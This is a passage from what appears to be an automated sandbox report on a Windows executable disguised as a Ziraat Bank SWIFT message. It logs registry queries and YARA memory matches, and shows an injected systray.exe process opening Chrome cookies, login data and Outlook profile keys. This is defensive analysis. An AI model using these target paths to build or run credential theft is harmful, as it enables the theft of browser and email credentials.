Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 0000000A.00000002.560048415.0000000000820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.559572185.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.450620046.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.562531717.0000000000ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.413620011.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.388632949.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\systray.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Remote Access Functionality

Source: Yara match File source: 0000000A.00000002.560048415.0000000000820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.559572185.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.450620046.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.562531717.0000000000ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.413620011.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.388632949.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY